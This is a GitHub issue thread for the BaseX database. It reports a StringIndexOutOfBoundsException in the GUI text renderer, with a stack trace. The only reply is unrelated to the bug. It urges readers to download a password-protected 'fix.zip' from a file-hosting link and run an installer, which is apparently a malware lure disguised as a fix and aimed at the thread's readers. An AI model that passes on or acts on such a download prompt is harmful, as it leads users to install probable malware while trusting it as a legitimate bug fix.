### ISSUE TITLE
GUI: Text rendering: Out of bounds

### ISSUE THREAD

**Issue by ChristianGruen** [BaseXdb/basex#2327]
Caused by 5e350dfef36a38c8a480f7548f508e8dc6ac0c5d:

```
java.lang.StringIndexOutOfBoundsException: offset 18290, count -1, length 49583
  at java.base/java.lang.String.checkBoundsOffCount(String.java:3304)
  at java.base/java.lang.String.<init>(String.java:505)
  at org.basex.util.Token.string(Token.java:132)
  at org.basex.gui.text.TextIterator.substring(TextIterator.java:98)
  at org.basex.gui.text.TextRenderer.mark(TextRenderer.java:497)
  at org.basex.gui.text.TextRenderer.write(TextRenderer.java:446)
  at org.basex.gui.text.TextRenderer.paintComponent(TextRenderer.java:130)
```

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
